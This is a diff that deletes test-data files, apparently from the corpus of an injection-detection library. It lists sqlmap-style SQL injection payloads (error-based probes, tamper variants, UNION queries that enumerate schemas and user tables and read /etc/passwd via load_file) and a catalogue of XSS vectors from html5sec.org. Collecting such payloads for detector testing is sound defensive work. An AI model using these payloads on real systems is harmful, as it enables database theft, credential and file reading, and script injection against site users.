1%' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND '%'='
|
||||
1%' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND '%'='
|
||||
1%') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('%'='
|
||||
1%') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('%'='
|
||||
1%') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('%'='
|
||||
1%')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('%'='
|
||||
1%')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('%'='
|
||||
1%')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('%'='
|
||||
1%'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('%'='
|
||||
1%'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('%'='
|
||||
1%'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('%'='
|
||||
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eLVs'='eLVs
|
||||
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eVVr' LIKE 'eVVr
|
||||
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- OiYW
|
||||
1' IN BOOLEAN MODE) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)#
|
||||
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (2270=3285) THEN 1 ELSE 0x28 END))#
|
||||
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (7449=7449) THEN 1 ELSE 0x28 END))#
|
||||
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'BiBK' LIKE 'BiBK
|
||||
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'PqYc'='PqYc
|
||||
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- WaOc
|
||||
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('bgJB'='bgJB
|
||||
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('nPXQ' LIKE 'nPXQ
|
||||
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ahKA
|
||||
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('MTGN'='MTGN
|
||||
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('UTnW' LIKE 'UTnW
|
||||
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- jjec
|
||||
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('apRZ'='apRZ
|
||||
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('uTOg' LIKE 'uTOg
|
||||
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- zMbs
|
||||
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('BQCu' LIKE 'BQCu
|
||||
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('dmjR'='dmjR
|
||||
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('OhUO' LIKE 'OhUO
|
||||
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('sonC'='sonC
|
||||
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('LfMY'='LfMY
|
||||
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('MWjv' LIKE 'MWjv
|
||||
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('FTHS'='FTHS
|
||||
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('igdM' LIKE 'igdM
|
||||
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('WZKG' LIKE 'WZKG
|
||||
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('yWmg'='yWmg
|
||||
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('FUsX' LIKE 'FUsX
|
||||
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('mBLH'='mBLH
|
||||
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (3370=3370
|
||||
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- rXfN
|
||||
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (9212=9212
|
||||
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- KZqT
|
||||
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (9114=9114
|
||||
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- eHGn
|
||||
1)) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((2068=2068
|
||||
1)) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((7248=7248
|
||||
1)) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((3064=3064
|
||||
1))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (((5697=5697
|
||||
1))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (((1805=1805
|
||||
1))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (((5031=5031
|
||||
EXP(~(SELECT * FROM (SELECT CONCAT(0x71786a7671,(SELECT (ELT(7823=7823,1))),0x7162716b71,0x78))x))
|
File diff suppressed because it is too large
Load Diff
|
@ -1,22 +0,0 @@
|
|||
#
|
||||
# Attacks pulled out of the examples from SQLMAP
|
||||
#
|
||||
|
||||
# https:#svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2mssqlhash.py
|
||||
1%23%0AAND%23%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2morehash.py
|
||||
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2hash.py
|
||||
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2dash.py
|
||||
1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/modsecurityzeroversioned.py
|
||||
1+/*!00000AND+2>1*/--'
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/halfversionedmorekeywords.py
|
||||
value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
|
||||
|
|
@ -1,56 +0,0 @@
|
|||
1' and '1' like '1
|
||||
1' and '1' like '0
|
||||
1' and 0 < (select length(@@version)) and '1' like '1
|
||||
1' own3d by 1
|
||||
1' order by 1#
|
||||
1' order by 15000#
|
||||
1' order by 2 #
|
||||
1' order by 4 #
|
||||
1' order by 3 #
|
||||
1' and 1=0 union all select 0x373134,0x373135#
|
||||
1' and 1 = 0 UNION ALL SELECT 0,CONCAT(@@version,0x5468655f4d6f6c652e46316e67657221)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.schemata where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 2 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 4 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 6 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 1 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 3 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 5 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 1 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(user(), 0x20),IFNULL(version(), 0x20),IFNULL(database(), 0x20)),0x3a3a2d3a3a)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f6574632f70617373776f7264), 0x20)),0x3a3a2d3a3a)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f746d702f6a756e6b), 0x20)),0x3a3a2d3a3a)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.adm where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin_users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admins where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrator where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrador where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administradores where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.client where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.clients where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.jos_users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.login where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.logins where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user_admin where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuario where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios_admin where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usr where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usrs where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.wp_users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d6173 and table_name like 0x2541424c4525#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 4 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 5 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 2 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 3 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 1 #
|
File diff suppressed because it is too large
Load Diff
|
@ -1,3 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/68
|
||||
|
||||
%3Cobject%00IRSDL+allowScriptAccess%3Dalways+data%3D%2F%2F0me.me%2Fdemo%2Fxss%2Fflash%2FnormalEmbededXSS.swf%3F
|
|
@ -1,3 +0,0 @@
|
|||
# https://twitter.com/0x6D6172696F/status/394932823645503488
|
||||
# http://pastebin.com/jNPbhduR
|
||||
<p style="font-family:',;a\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d\\61lert\\28\\31\\29\\3e:1'">
|
|
@ -1,4 +0,0 @@
|
|||
#
|
||||
# https://github.com/angular/angular.js/pull/11290
|
||||
#
|
||||
<animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
|
|
@ -1,488 +0,0 @@
|
|||
#
|
||||
# http://html5sec.org
|
||||
# retreieved 2013-11-06
|
||||
|
||||
test 1 <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
|
||||
# obsolete firefox 3
|
||||
#test 2 <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||
|
||||
# obsolete firefox 3
|
||||
#test 3 <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||
|
||||
test 4 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
||||
|
||||
test 5 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
||||
|
||||
test 6 <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
|
||||
|
||||
test 7 <input onfocus=write(1) autofocus>
|
||||
|
||||
test 8 <input onblur=write(1) autofocus><input autofocus>
|
||||
|
||||
test 9 <a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
|
||||
|
||||
test 10 <video poster=javascript:alert(1)//></video>
|
||||
|
||||
test 11 <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
|
||||
|
||||
test 12 <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
|
||||
|
||||
# opera only, only "DoS"
|
||||
# test 13 <x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
|
||||
|
||||
# opera only, "DoS"
|
||||
# test 14 <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
|
||||
|
||||
test 15 <script>({0:#0=alert/#0#/#0#(0)})</script>
|
||||
|
||||
test 16 X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
|
||||
|
||||
test 17 <?xml-stylesheet href="javascript:alert(1)"?><root/>
|
||||
|
||||
test 18 <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
|
||||
|
||||
# obsolete firefox 3
|
||||
# test 19 <meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
|
||||
|
||||
test 20 <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
|
||||
|
||||
test 21 <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
|
||||
|
||||
test 22 <input onblur=focus() autofocus><input>
|
||||
|
||||
test 23 <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
|
||||
|
||||
test 24 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
|
||||
|
||||
test 25 <script src="#">{alert(1)}</script>;1
|
||||
|
||||
# obsolete firefox 4 and under
|
||||
# test 26 +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
|
||||
|
||||
test 27 <style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
|
||||
|
||||
test 28 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
|
||||
|
||||
test 29 <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
|
||||
|
||||
test 30 <style>@import "data:,*%7bx:expression(write(1))%7D";</style>
|
||||
|
||||
test 31_1 <frameset onload=alert(1)>
|
||||
|
||||
test 31_2 <body onload=alert(1)>
|
||||
|
||||
test 32 <table background="javascript:alert(1)"></table>
|
||||
|
||||
test 33 <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
|
||||
|
||||
test 34 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%25;height:100%25 src=test.vml#xss></vmlframe>
|
||||
|
||||
test 35 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
|
||||
|
||||
test 36 <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
|
||||
|
||||
test 37 <!--<img src="--><img src=x onerror=alert(1)//">
|
||||
|
||||
test 38 <comment><img src="</comment><img src=x onerror=alert(1)//">
|
||||
|
||||
# obsolete, FF 3.6 and Opera 11
|
||||
#test 39_1 <![><img src="]><img src=x onerror=alert(1)//">
|
||||
|
||||
test 39_2 <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
|
||||
|
||||
test 40 <style><img src="</style><img src=x onerror=alert(1)//">
|
||||
|
||||
test 41 <li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
|
||||
|
||||
test 42 <head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
|
||||
|
||||
test 43 <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style>
|
||||
|
||||
test 44 <style>*[{}@import'test.css?]{color: green;}</style>X
|
||||
|
||||
test 45 <div style="font-family:'foo[a];color:red;';">XXX</div>
|
||||
|
||||
test 46 <div style="font-family:foo}color=red;">XXX</div>
|
||||
|
||||
test 47 <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
|
||||
|
||||
test 48 <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
|
||||
|
||||
test 49 <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
|
||||
|
||||
test 50 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
||||
|
||||
test 51 <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
|
||||
|
||||
test 52 <x style="behavior:url(test.sct)">
|
||||
|
||||
test 53_1 <xml id="xss" src="test.htc"></xml>
|
||||
|
||||
test 53_2 <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
|
||||
|
||||
test 54 <script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script
|
||||
|
||||
test 55_1 <video><source onerror="alert(1)">
|
||||
test 55_2 <audio><source onerror="alert(1)">
|
||||
|
||||
test 56 <video onerror="alert(1)"><source></source></video>
|
||||
|
||||
#
|
||||
# Obsolete.. Firefox 3.6, Chrome 5, Safari 4
|
||||
#
|
||||
# test 57 <b <script>alert(1)//</script>0</script></b>
|
||||
|
||||
#
|
||||
# Obsolete Firefox 3.6
|
||||
#
|
||||
